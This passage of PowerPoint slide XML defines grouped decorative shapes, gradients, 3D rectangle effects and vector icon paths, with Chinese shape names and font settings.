                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
